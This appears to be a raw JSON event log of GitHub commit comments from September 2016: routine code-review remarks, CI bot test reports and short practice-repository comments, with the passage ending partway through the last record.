{"id":"4626162316","type":"CommitCommentEvent","actor":{"login":"eduardotorressubias"},"repo":{"name":"eduardotorressubias/eduardo"},"payload":{"comment":{"id":19195979,"position":null,"line":null,"path":null,"commit_id":"294f3a852845ab2d71339a98ffcd7df89c4843e0","created_at":"2016-09-27T18:44:59Z","updated_at":"2016-09-27T18:44:59Z","body":"olaaaaaa"}},"created_at":"2016-09-27T18:44:59Z"}
{"id":"4626162332","type":"CommitCommentEvent","actor":{"login":"Massespf"},"repo":{"name":"Massespf/RepoTest"},"payload":{"comment":{"id":19195980,"position":null,"line":null,"path":null,"commit_id":"a3f4d79556e9ded1f03176c125c10f77a1474002","created_at":"2016-09-27T18:44:59Z","updated_at":"2016-09-27T18:44:59Z","body":"hola"}},"created_at":"2016-09-27T18:44:59Z"}
{"id":"4626163050","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19195983,"position":106,"line":106,"path":"lib/node_modules/@stdlib/utils/deep-set/test/test.validate.js","commit_id":"4b646d637ce1e05e4ea7a642ce1d4a5cddc6ba48","created_at":"2016-09-27T18:45:07Z","updated_at":"2016-09-27T18:45:07Z","body":"Add test case to test that no destination props are set."}},"created_at":"2016-09-27T18:45:07Z"}
{"id":"4626163776","type":"CommitCommentEvent","actor":{"login":"vjeux"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":19195984,"position":null,"line":null,"path":null,"commit_id":"6135db1ccf53e7aba1a09490b1fc1e93c8fb6a97","created_at":"2016-09-27T18:45:10Z","updated_at":"2016-09-27T18:45:10Z","body":"<img width=\"759\" alt=\"screen shot 2016-09-27 at 11 44 41 am\" src=\"https://cloud.githubusercontent.com/assets/197597/18887144/d6be0c5e-84a7-11e6-8f3a-2764e9274c64.png\">\r\n"}},"created_at":"2016-09-27T18:45:10Z"}
{"id":"4626168346","type":"CommitCommentEvent","actor":{"login":"yeputons"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19195995,"position":null,"line":null,"path":null,"commit_id":"75fb7f5a261674c0107b25cd97f4d6f530e601e1","created_at":"2016-09-27T18:46:01Z","updated_at":"2016-09-27T18:46:01Z","body":"@jeffkaufman Thanks for mentioning! I've left some comments. Would you mind tagging me on the next Redis-related commit as well?"}},"created_at":"2016-09-27T18:46:01Z"}
{"id":"4626171618","type":"CommitCommentEvent","actor":{"login":"deivid-rodriguez"},"repo":{"name":"bbatsov/rubocop"},"payload":{"comment":{"id":19196003,"position":null,"line":null,"path":null,"commit_id":"2bb7cc411717fd702b80f039d82ee8264462ab57","created_at":"2016-09-27T18:46:32Z","updated_at":"2016-09-27T18:46:32Z","body":"Cool, I'm working on a few encoding issues and related refactorings.\r\n\r\nI was thinking on opening PR's once I get Travis consistently green in all rubies and against UTF-8 and non UTF-8 external encodings.\r\n\r\nBut I don't think this particular change would break anything right now, so I can start with that."}},"created_at":"2016-09-27T18:46:32Z"}
{"id":"4626178668","type":"CommitCommentEvent","actor":{"login":"crcastle"},"repo":{"name":"heroku/kafka-demo"},"payload":{"comment":{"id":19196024,"position":null,"line":null,"path":null,"commit_id":"0926bbf2738fcc0ba216d69585e8d621cc5ae0db","created_at":"2016-09-27T18:47:44Z","updated_at":"2016-09-27T18:47:44Z","body":"👍 Thanks.  I noticed this too."}},"created_at":"2016-09-27T18:47:44Z"}
{"id":"4626180882","type":"CommitCommentEvent","actor":{"login":"cben"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19196028,"position":5,"line":0,"path":"db/migrate/20150604154825_rename_container_node_conditions_to_container_conditions.rb","commit_id":"1c9466667ccdf0c688b9d8d8ab77cb8159df37eb","created_at":"2016-09-27T18:48:07Z","updated_at":"2016-09-27T18:48:07Z","body":"I don't think we should be changing migration code after the fact.\nIIUC this specific message refers to DB table ( which is called container_groups to this day), not to user visible concept.\n=> should stay as is"}},"created_at":"2016-09-27T18:48:07Z"}
{"id":"4626185080","type":"CommitCommentEvent","actor":{"login":"jgabry"},"repo":{"name":"stan-dev/rstanarm"},"payload":{"comment":{"id":19196040,"position":null,"line":null,"path":null,"commit_id":"d3ccfc3a61cb92b49eb582b9a029dc60e72c942f","created_at":"2016-09-27T18:48:50Z","updated_at":"2016-09-27T18:48:50Z","body":"Only part of scaled is ignored. From the code in stan_glm.fit it looks like\nwe still do the 2*sd(y) stuff if scaled=TRUE and QR=TRUE. So it's only the\nstuff with x that is ignored if QR=TRUE.\n\nOn Tue, Sep 27, 2016 at 2:43 PM, bgoodri <notifications@github.com> wrote:\n\n> Should say that scaled is ignored if QR = TRUE.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/stan-dev/rstanarm/commit/d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19195943>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHb4Q-8AYy5Nc4jcMymlNejeMEr0mlixks5quWO_gaJpZM4KIA1X>\n> .\n>\n"}},"created_at":"2016-09-27T18:48:50Z"}
{"id":"4626186779","type":"CommitCommentEvent","actor":{"login":"moleisking"},"repo":{"name":"moleisking/SAM"},"payload":{"comment":{"id":19196044,"position":null,"line":null,"path":null,"commit_id":"4b748139fce911da21abbf4dede080d0f6f0e9d9","created_at":"2016-09-27T18:49:08Z","updated_at":"2016-09-27T18:49:08Z","body":"We are going to need cur variables even on a laptop for when the user is on the move."}},"created_at":"2016-09-27T18:49:08Z"}
{"id":"4626187191","type":"CommitCommentEvent","actor":{"login":"rmaratos"},"repo":{"name":"CMU-440-F16/p1"},"payload":{"comment":{"id":19196046,"position":null,"line":null,"path":null,"commit_id":"ceb6a026afdd691a3bc0772c28ad56638823bb4f","created_at":"2016-09-27T18:49:12Z","updated_at":"2016-09-27T18:49:12Z","body":":( Any chance of getting a macOS binary?"}},"created_at":"2016-09-27T18:49:12Z"}
{"id":"4626187781","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/middleware"},"payload":{"comment":{"id":19196049,"position":4,"line":1354,"path":"src/dispatcher/plugins/DiskPlugin.py","commit_id":"864672e19194ed600377c0909410803d6ca1ecb6","created_at":"2016-09-27T18:49:19Z","updated_at":"2016-09-27T18:49:19Z","body":"ok, I had not added it to the top level disk schema, so I did not know what purpose it solved.\r\n\r\nIf you are suggesting that we just remove this from here and leave it just inside `disk-status` then I agree and will do that.\r\n\r\n"}},"created_at":"2016-09-27T18:49:19Z"}
{"id":"4626188624","type":"CommitCommentEvent","actor":{"login":"lemmy04"},"repo":{"name":"CyanogenMod/android_device_samsung_manta"},"payload":{"comment":{"id":19196050,"position":null,"line":null,"path":null,"commit_id":"76df05906ef7e52cb13a6359254fe27681060ef9","created_at":"2016-09-27T18:49:27Z","updated_at":"2016-09-27T18:49:27Z","body":"is there any reason for this change?"}},"created_at":"2016-09-27T18:49:27Z"}
{"id":"4626191841","type":"CommitCommentEvent","actor":{"login":"kostya"},"repo":{"name":"lexborisov/myhtml"},"payload":{"comment":{"id":19196056,"position":23,"line":91,"path":"source/myhtml/tree.h","commit_id":"e76dc4b9f4bc6a485d0862f64def6bee613c171f","created_at":"2016-09-27T18:50:00Z","updated_at":"2016-09-27T18:50:00Z","body":"hm, i think this should be first, this is common practice in many libs, \r\nbecause size of struct can be changed later, position of data always be the same, better for bindings."}},"created_at":"2016-09-27T18:50:00Z"}
{"id":"4626197949","type":"CommitCommentEvent","actor":{"login":"dimvar"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19196080,"position":null,"line":null,"path":null,"commit_id":"82f23897059d244d793518a1355fe2e1cc0ba80f","created_at":"2016-09-27T18:51:03Z","updated_at":"2016-09-27T18:51:03Z","body":"Can you do the following, to help me debug this?\r\nFirst, you can build your project and print out the sorted property names that are collected by the GatherExternProperties pass, like this: https://github.com/dimvar/closure-compiler/commit/067e4b233ec6a00a133ee1ccd1edc021b5bb85f0\r\n\r\nThen, you can move the old-type-checker run before GatherExternProperties, and print the property names again: https://github.com/dimvar/closure-compiler/commit/2cbad239b68d4da75cacac5361636ecb45f9098d\r\n\r\nThen you can diff the two, and see what the differences are. That can you an idea of how this commit affected GatherExternProperties, and it may help when creating a test case.\r\n\r\n\r\nFor the example you mention above, I don't know exactly how to use it yet. What is the definition of `MessagePort`? Did you just build this code without any other definitions, and the default externs, and got the typing percentage difference?\r\n\r\n\r\nAlso, can you open a github issue to continue the discussion there? It's easier for us to track bugs using the issue tracker, rather than do it here."}},"created_at":"2016-09-27T18:51:03Z"}
{"id":"4626198761","type":"CommitCommentEvent","actor":{"login":"stottle"},"repo":{"name":"githubteacher/dev-27-sep"},"payload":{"comment":{"id":19196083,"position":null,"line":null,"path":null,"commit_id":"5305c412fbbb31d852285243316c25c38c81d0a8","created_at":"2016-09-27T18:51:12Z","updated_at":"2016-09-27T18:51:12Z","body":"Have a hard time considering a whitespace only change \"awesome\""}},"created_at":"2016-09-27T18:51:12Z"}
{"id":"4626199777","type":"CommitCommentEvent","actor":{"login":"amyflatt"},"repo":{"name":"amyflatt/unity-C-"},"payload":{"comment":{"id":19196087,"position":null,"line":null,"path":null,"commit_id":"3f2a961747cef8894b32c31264a2f1b81a9793df","created_at":"2016-09-27T18:51:23Z","updated_at":"2016-09-27T18:51:23Z","body":"use update only if you are sure you want the action to happen every minute.\r\n"}},"created_at":"2016-09-27T18:51:23Z"}
{"id":"4626200837","type":"CommitCommentEvent","actor":{"login":"bgoodri"},"repo":{"name":"stan-dev/rstanarm"},"payload":{"comment":{"id":19196091,"position":null,"line":null,"path":null,"commit_id":"d3ccfc3a61cb92b49eb582b9a029dc60e72c942f","created_at":"2016-09-27T18:51:33Z","updated_at":"2016-09-27T18:51:33Z","body":"Yeah, although that is dirty\n\nOn Tue, Sep 27, 2016 at 2:48 PM, Jonah Gabry <notifications@github.com>\nwrote:\n\n> Only part of scaled is ignored. From the code in stan_glm.fit it looks like\n> we still do the 2*sd(y) stuff if scaled=TRUE and QR=TRUE. So it's only the\n> stuff with x that is ignored if QR=TRUE.\n>\n> On Tue, Sep 27, 2016 at 2:43 PM, bgoodri <notifications@github.com> wrote:\n>\n> > Should say that scaled is ignored if QR = TRUE.\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/stan-dev/rstanarm/commit/\n> d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19195943>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AHb4Q-\n> 8AYy5Nc4jcMymlNejeMEr0mlixks5quWO_gaJpZM4KIA1X>\n> > .\n> >\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/stan-dev/rstanarm/commit/d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196040>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADOrqgZ5-lY5ADL9dZhpUoekOutl7yyHks5quWUTgaJpZM4KIA1X>\n> .\n>\n"}},"created_at":"2016-09-27T18:51:33Z"}
{"id":"4626204532","type":"CommitCommentEvent","actor":{"login":"jonathansampson"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19196098,"position":null,"line":null,"path":null,"commit_id":"41acbd0ca208296e06068e508c49f2636ed41ac5","created_at":"2016-09-27T18:52:13Z","updated_at":"2016-09-27T18:52:13Z","body":"@diracdeltas I am not able to confirm that this resolves the issue, as I understand it.\r\n\r\nScenario: User navigates to http://www.twitter.com, and then expands the Bravery Settings Panel and turns on Block Scripts. The frame reloads, and the user is then redirected to http://mobile.twitter.com via a `<noscript>` element.\r\n\r\nThe above scenario still plays through."}},"created_at":"2016-09-27T18:52:13Z"}
{"id":"4626209669","type":"CommitCommentEvent","actor":{"login":"mikebrady"},"repo":{"name":"mikebrady/shairport-sync"},"payload":{"comment":{"id":19196109,"position":null,"line":null,"path":null,"commit_id":"d9b28443fc0e465f41dbe54371a1c8ca62c2be6e","created_at":"2016-09-27T18:53:05Z","updated_at":"2016-09-27T18:53:05Z","body":"It's only when the internal volume control is used or if you're outputting to 8 bit. "}},"created_at":"2016-09-27T18:53:05Z"}
{"id":"4626210564","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19196110,"position":null,"line":null,"path":null,"commit_id":"34a5020df0f106c14b556990bf7d3f0f54841839","created_at":"2016-09-27T18:53:14Z","updated_at":"2016-09-27T18:53:14Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Tests Failed (1764 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-34a5020df0f106c14b556990bf7d3f0f54841839-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.58%25-red.svg)</a> \n"}},"created_at":"2016-09-27T18:53:14Z"}
{"id":"4626219542","type":"CommitCommentEvent","actor":{"login":"aaronabf"},"repo":{"name":"CMU-440-F16/p1"},"payload":{"comment":{"id":19196128,"position":null,"line":null,"path":null,"commit_id":"ceb6a026afdd691a3bc0772c28ad56638823bb4f","created_at":"2016-09-27T18:54:44Z","updated_at":"2016-09-27T18:54:44Z","body":"Please post this on piazza.\n\nOn Tue, Sep 27, 2016 at 2:49 PM, Robert Maratos <notifications@github.com>\nwrote:\n\n> :( Any chance of getting a macOS binary?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/CMU-440-F16/p1/commit/ceb6a026afdd691a3bc0772c28ad56638823bb4f#commitcomment-19196046>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEAeo2fU4bKt1NhEQZK3rZXf-Ge7yFxKks5quWUogaJpZM4KIBXH>\n> .\n>\n\n\n\n-- \nAaron Friedlander\nCarnegie Mellon University\n+1 (484) 343-0450 | aaron.abf@gmail.com\n"}},"created_at":"2016-09-27T18:54:44Z"}
{"id":"4626223474","type":"CommitCommentEvent","actor":{"login":"salsakran"},"repo":{"name":"metabase/metabase"},"payload":{"comment":{"id":19196138,"position":29,"line":275,"path":"src/metabase/db/migrations.clj","commit_id":"bb0a695060288bdd90373900c3b589fed58567d2","created_at":"2016-09-27T18:55:21Z","updated_at":"2016-09-27T18:55:21Z","body":"Do all of the old types have `type/X` analogues? "}},"created_at":"2016-09-27T18:55:21Z"}
{"id":"4626224685","type":"CommitCommentEvent","actor":{"login":"Angiesak91"},"repo":{"name":"Angiesak91/Microondas"},"payload":{"comment":{"id":19196139,"position":null,"line":null,"path":null,"commit_id":"ec277c159de7aca005c784e86dcc6e75ce5b0d74","created_at":"2016-09-27T18:55:34Z","updated_at":"2016-09-27T18:55:34Z","body":"."}},"created_at":"2016-09-27T18:55:34Z"}
{"id":"4626226546","type":"CommitCommentEvent","actor":{"login":"vskin4u"},"repo":{"name":"githubteacher/sep-27-developers"},"payload":{"comment":{"id":19196144,"position":null,"line":null,"path":null,"commit_id":"8785f2611f570f8cd5336d6e75c4244ae0e19cef","created_at":"2016-09-27T18:55:53Z","updated_at":"2016-09-27T18:55:53Z","body":":+1: "}},"created_at":"2016-09-27T18:55:53Z"}
{"id":"4626235870","type":"CommitCommentEvent","actor":{"login":"mhuang403"},"repo":{"name":"meghancoyle/itp460class"},"payload":{"comment":{"id":19196173,"position":null,"line":null,"path":null,"commit_id":"f820a4da304668a2baa317d33cbb33d7290a8517","created_at":"2016-09-27T18:57:31Z","updated_at":"2016-09-27T18:57:31Z","body":"whoop dee doo"}},"created_at":"2016-09-27T18:57:31Z"}
{"id":"4626236673","type":"CommitCommentEvent","actor":{"login":"notsig11"},"repo":{"name":"githubteacher/dev-27-sep"},"payload":{"comment":{"id":19196176,"position":null,"line":null,"path":null,"commit_id":"5305c412fbbb31d852285243316c25c38c81d0a8","created_at":"2016-09-27T18:57:39Z","updated_at":"2016-09-27T18:57:39Z","body":"Burn."}},"created_at":"2016-09-27T18:57:39Z"}
{"id":"4626238340","type":"CommitCommentEvent","actor":{"login":"Rahul11486"},"repo":{"name":"Rahul11486/gradlelib"},"payload":{"comment":{"id":19196187,"position":null,"line":null,"path":null,"commit_id":"2313d2229339c122e9e63f999175aadbe0fde2fc","created_at":"2016-09-27T18:57:54Z","updated_at":"2016-09-27T18:57:54Z","body":"Comt"}},"created_at":"2016-09-27T18:57:54Z"}
{"id":"4626238673","type":"CommitCommentEvent","actor":{"login":"kocharvi"},"repo":{"name":"githubteacher/sep-27-developers"},"payload":{"comment":{"id":19196189,"position":2,"line":2,"path":"test.md","commit_id":"8785f2611f570f8cd5336d6e75c4244ae0e19cef","created_at":"2016-09-27T18:57:57Z","updated_at":"2016-09-27T18:57:57Z","body":"great city"}},"created_at":"2016-09-27T18:57:57Z"}
{"id":"4626239853","type":"CommitCommentEvent","actor":{"login":"aktau"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19196194,"position":null,"line":null,"path":null,"commit_id":"04d82d81278c564080cc116655e7ad415f90f637","created_at":"2016-09-27T18:58:09Z","updated_at":"2016-09-27T18:58:09Z","body":"> So on the GS, number have N bit for integer part, and only 4 bit for fractional. (note my comment sucks). So you can have 0, 0.625 etc... So 0.4995 must be rounded to 1 not 0.\r\n\r\nReal slick find :). But yea, if that's the case, the comment could use a bit of sprucing up. It wouldn't understand it if I came upon it."}},"created_at":"2016-09-27T18:58:09Z"}
{"id":"4626240024","type":"CommitCommentEvent","actor":{"login":"knownasilya"},"repo":{"name":"denali-js/denali"},"payload":{"comment":{"id":19196197,"position":null,"line":null,"path":null,"commit_id":"c98a6f6b2e110e6a0fb4ca0c2c4e5a2226b46328","created_at":"2016-09-27T18:58:11Z","updated_at":"2016-09-27T18:58:11Z","body":"👍 "}},"created_at":"2016-09-27T18:58:11Z"}
{"id":"4626242880","type":"CommitCommentEvent","actor":{"login":"skorzeli"},"repo":{"name":"githubteacher/dev-27-sep"},"payload":{"comment":{"id":19196205,"position":null,"line":null,"path":null,"commit_id":"5305c412fbbb31d852285243316c25c38c81d0a8","created_at":"2016-09-27T18:58:43Z","updated_at":"2016-09-27T18:58:43Z","body":"🔥 "}},"created_at":"2016-09-27T18:58:43Z"}
{"id":"4626247452","type":"CommitCommentEvent","actor":{"login":"cben"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19196218,"position":12,"line":0,"path":"app/views/miq_policy/_policy_folders.html.haml","commit_id":"1c9466667ccdf0c688b9d8d8ab77cb8159df37eb","created_at":"2016-09-27T18:59:30Z","updated_at":"2016-09-27T18:59:30Z","body":"IIRC the keys here - coming from `@folders` - are mechanically constructed in controller from class names, so if you change them it won't work.  I'll verify tomorrow...\n\nonly the values are visible in UI but they're already \"pod\""}},"created_at":"2016-09-27T18:59:30Z"}
{"id":"4626249201","type":"CommitCommentEvent","actor":{"login":"jgabry"},"repo":{"name":"stan-dev/rstanarm"},"payload":{"comment":{"id":19196222,"position":null,"line":null,"path":null,"commit_id":"d3ccfc3a61cb92b49eb582b9a029dc60e72c942f","created_at":"2016-09-27T18:59:49Z","updated_at":"2016-09-27T18:59:49Z","body":"Dirty as in too data dependent? Why are we doing it at all?\n\nOn Tue, Sep 27, 2016 at 2:51 PM, bgoodri <notifications@github.com> wrote:\n\n> Yeah, although that is dirty\n>\n> On Tue, Sep 27, 2016 at 2:48 PM, Jonah Gabry <notifications@github.com>\n> wrote:\n>\n> > Only part of scaled is ignored. From the code in stan_glm.fit it looks\n> like\n> > we still do the 2*sd(y) stuff if scaled=TRUE and QR=TRUE. So it's only\n> the\n> > stuff with x that is ignored if QR=TRUE.\n> >\n> > On Tue, Sep 27, 2016 at 2:43 PM, bgoodri <notifications@github.com>\n> wrote:\n> >\n> > > Should say that scaled is ignored if QR = TRUE.\n> > >\n> > > —\n> > > You are receiving this because you authored the thread.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/stan-dev/rstanarm/commit/\n> > d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19195943>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/AHb4Q-\n> > 8AYy5Nc4jcMymlNejeMEr0mlixks5quWO_gaJpZM4KIA1X>\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/stan-dev/rstanarm/commit/\n> d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196040>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/ADOrqgZ5-\n> lY5ADL9dZhpUoekOutl7yyHks5quWUTgaJpZM4KIA1X>\n>\n> > .\n> >\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/stan-dev/rstanarm/commit/d3ccfc3a61cb92b49eb582b9a029dc60e72c942f#commitcomment-19196091>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AHb4Q-4d65utKNB-gMGY1GmXEvGj-I8sks5quWW3gaJpZM4KIA1X>\n> .\n>\n"}},"created_at":"2016-09-27T18:59:49Z"}
{"id":"4626249672","type":"CommitCommentEvent","actor":{"login":"linhphi9x94"},"repo":{"name":"BlurOS/android_device_pantech_ef63l"},"payload":{"comment":{"id":19196223,"position":null,"line":null,"path":null,"commit_id":"e459e44ed432c4b1ac152e5ec426da9a599defe4","created_at":"2016-09-27T18:59:55Z","updated_at":"2016-09-27T18:59:55Z","body":"Great <3"}},"created_at":"2016-09-27T18:59:55Z"}
{"id":"4626252057","type":"CommitCommentEvent","actor":{"login":"cben"},"repo":{"name":"ManageIQ/manageiq"},"payload":{"comment":{"id":19196230,"position":5,"line":0,"path":"app/controllers/ems_common.rb","commit_id":"e6c9e1a8d5bef4d0525fec8d5b3ddb1a107e957f","created_at":"2016-09-27T19:00:19Z","updated_at":"2016-09-27T19:00:19Z","body":"good catch :+1:"}},"created_at":"2016-09-27T19:00:19Z"}
{"id":"4626252899","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"C5T/Current"},"payload":{"comment":{"id":19196231,"position":3,"line":28,"path":"Karl/integrations/nodejs/test.js","commit_id":"145384ebe222d7c0679f977f98f078263188d5a1","created_at":"2016-09-27T19:00:28Z","updated_at":"2016-09-27T19:00:28Z","body":"Why not `const ... = require(...);`  if you started using `const` in the Node.js code?"}},"created_at":"2016-09-27T19:00:28Z"}
{"id":"4626253229","type":"CommitCommentEvent","actor":{"login":"simon816"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":19196234,"position":18,"line":133,"path":"src/main/java/org/spongepowered/common/service/user/UserDiscoverer.java","commit_id":"403fb0e571563d953fdfd476850939e4943a043a","created_at":"2016-09-27T19:00:30Z","updated_at":"2016-09-27T19:00:30Z","body":"Pretty sure this should just be `\".\"` as it's not regex"}},"created_at":"2016-09-27T19:00:30Z"}
{"id":"4626254352","type":"CommitCommentEvent","actor":{"login":"rsmithlal"},"repo":{"name":"rsmithlal/ClimateDataRescue"},"payload":{"comment":{"id":19196236,"position":5,"line":70,"path":"config/application.rb","commit_id":"fe721ded7f40ca2dbbf4e33f5764c5537a5c477b","created_at":"2016-09-27T19:00:41Z","updated_at":"2016-09-27T19:00:41Z","body":"FIx this, it's wrong."}},"created_at":"2016-09-27T19:00:41Z"}
{"id":"4626254387","type":"CommitCommentEvent","actor":{"login":"DjWarmonger"},"repo":{"name":"dydzio0614/vcmi"},"payload":{"comment":{"id":19196237,"position":31,"line":3044,"path":"lib/CGameState.cpp","commit_id":"0f395adbd8a8a14cfeb006d3f3510c67db215676","created_at":"2016-09-27T19:00:41Z","updated_at":"2016-09-27T19:00:41Z","body":"Should we be able to get enemy mana limit info outside the battle? Correct me if I'm wrong, but I think we should not. One possibility is to set it to zero."}},"created_at":"2016-09-27T19:00:41Z"}
{"id":"4626256568","type":"CommitCommentEvent","actor":{"login":"Aaahh"},"repo":{"name":"BlurOS/android_device_pantech_ef63l"},"payload":{"comment":{"id":19196240,"position":null,"line":null,"path":null,"commit_id":"e459e44ed432c4b1ac152e5ec426da9a599defe4","created_at":"2016-09-27T19:01:04Z","updated_at":"2016-09-27T19:01:04Z","body":"In one of the repos you wrote ef63 instead of ef63l"}},"created_at":"2016-09-27T19:01:04Z"}
{"id":"4626257770","type":"CommitCommentEvent","actor":{"login":"kkanzelmeyer"},"repo":{"name":"kkanzelmeyer/node-wakelight"},"payload":{"comment":{"id":19196245,"position":13,"line":16,"path":"src/wakelight.js","commit_id":"dab453374f9a2684626873a24a7ebb0f0eaef74a","created_at":"2016-09-27T19:01:17Z","updated_at":"2016-09-27T19:01:17Z","body":"@kanzelm3 would you peer review this implementation of the observer pattern?"}},"created_at":"2016-09-27T19:01:17Z"}
{"id":"4626259086","type":"CommitCommentEvent","actor":{"login":"lexborisov"},"repo":{"name":"lexborisov/myhtml"},"payload":{"comment":{"id":19196248,"position":23,"line":91,"path":"source/myhtml/tree.h","commit_id":"e76dc4b9f4bc6a485d0862f64def6bee613c171f","created_at":"2016-09-27T19:01:31Z","updated_at":"2016-09-27T19:01:31Z","body":"for example:\r\n```C\r\nmyhtml_tree_node_t node = {3,2};\r\n// set flags = 3, and tag_id = 2 ...\r\n```\r\n\r\nas well as the [alignment](https://en.wikipedia.org/wiki/Data_structure_alignment) of the data? Alignment will changed position for vars any way\r\n"}},"created_at":"2016-09-27T19:01:31Z"}
{"id":"4626259365","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19196249,"position":115,"line":824,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T19:01:35Z","updated_at":"2016-09-27T19:01:35Z","body":"Replace with DotPreconditoins"}},"created_at":"2016-09-27T19:01:35Z"}
{"id":"4626260213","type":"CommitCommentEvent","actor":{"login":"dsilvam"},"repo":{"name":"dotCMS/core"},"payload":{"comment":{"id":19196254,"position":118,"line":827,"path":"src/com/dotcms/content/elasticsearch/business/ESIndexAPI.java","commit_id":"152c0dcae0a53f356fe939b317c7ac380c551002","created_at":"2016-09-27T19:01:44Z","updated_at":"2016-09-27T19:01:44Z","body":"same as above"}},"created_at":"2016-09-27T19:01:44Z"}
{"id":"4626260245","type":"CommitCommentEvent","actor":{"login":"jcelerier"},"repo":{"name":"himito/himito.github.io"},"payload":{"comment":{"id":19196256,"position":null,"line":null,"path":null,"commit_id":"eaba05ab9b65aa731d914aaa5bb3fc943cc510cc","created_at":"2016-09-27T19:01:44Z","updated_at":"2016-09-27T19:01:44Z","body":"hola!"}},"created_at":"2016-09-27T19:01:44Z"}
{"id":"4626264648","type":"CommitCommentEvent","actor":{"login":"rsmithlal"},"repo":{"name":"rsmithlal/ClimateDataRescue"},"payload":{"comment":{"id":19196275,"position":5,"line":70,"path":"config/application.rb","commit_id":"d6207089ab5adb28c5cb346fd5e7be2b89de0c61","created_at":"2016-09-27T19:02:30Z","updated_at":"2016-09-27T19:02:30Z","body":"This is wrong, need to fix. Remove \"plugins\"."}},"created_at":"2016-09-27T19:02:30Z"}
{"id":"4626264719","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19196276,"position":null,"line":null,"path":null,"commit_id":"8e27dad5c9d3cfd72fdac6733b48b310e8dea506","created_at":"2016-09-27T19:02:30Z","updated_at":"2016-09-27T19:02:30Z","body":"license-update (axelstudios) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2357 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.28%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T19:02:30Z"}
{"id":"4626281463","type":"CommitCommentEvent","actor":{"login":"bgoodri"},"repo":{"name":"stan-dev/rstanarm"},"payload":{"comment":{"id":19196321,"position":null,"line":null,"path":null,"commit_id":"d3ccfc3a61cb92b49eb582b9a029dc60e72c942f","created_at":"2016-09-27T19:05:30Z","updated_at":"2016-09-27T19:05:30Z","body":"Dirty as in it contravenes Bayes Theorem but that doesn't bother Andrew too\nmuch. In practice, the average rstanarm user is going to get results closer\nto what Bayes Theorem implies with it than without it because too many of\nthem use ridiculous units for the outcome.\n\nOn Tue, Sep 27, 2016 at 2:59 PM, Jonah Gabry <notifications@github.com>\nwrote:\n\n> Dirty as in too data dependent? Why are we doing it at all?\n>\n> On Tue, Sep 27, 2016 at 2:51 PM, bgoodri <notifications@github.com> wrote:\n>\n> > Yeah, although that is dirty\n> >\n> > On Tue, Sep 27, 2016 at 2:48 PM, Jonah Gabry <notifications@github.com>\n> > wrote:\n> >\n> > > Only part of scaled is ignored. From the code in stan_glm.fit it looks\n> > like\n> > > we still do the 2*sd(y) stuff if scaled=TRUE and QR=TRUE. So it's only\n> > the\n> > > stuff with x that is ignored if QR=TRUE.\n> > 